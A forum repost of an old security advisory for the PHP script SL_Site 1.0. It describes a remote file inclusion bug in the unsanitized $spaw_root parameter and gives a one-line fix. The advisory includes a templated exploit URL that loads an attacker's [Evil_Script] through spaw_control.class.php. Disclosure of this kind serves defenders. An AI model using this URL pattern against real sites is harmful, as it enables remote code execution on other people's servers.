Jump to content
Guest Nemessis

[RST] SL_Site <= 1.0 RFI

Recommended Posts

Guest Nemessis
Posted

---------------------------------------------------------------------------

SL_Site <= 1.0 [spaw_root] Remote File Include Vulnerability

---------------------------------------------------------------------------

Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://rstcenter.com :

Remote : Yes

Critical Level : Dangerous

---------------------------------------------------------------------------

Affected software description :

~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : SL_Site

version : 1.0

URL : ftp://ftp1.comscripts.com/PHP/2032_slsite-10.zip

------------------------------------------------------------------

Exploit:

~~~~~

Variable $spaw_root not sanitized.When register_globals=on an attacker ca

n exploit this vulnerability with a simple php injection script.

# http://site.com/[path]/admin/editeur/spaw_control.class.php?spaw_root=[Evil_Script]

---------------------------------------------------------------------------

Solution :

~~~~~~~

declare variabel $spaw_root

---------------------------------------------------------------------------

Shoutz:

~~~

# Special greetz to my good friend [Oo]

# To all members of #h4cky0u and RST [ hTTp://rstcenter.com ]

---------------------------------------------------------------------------

*/

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...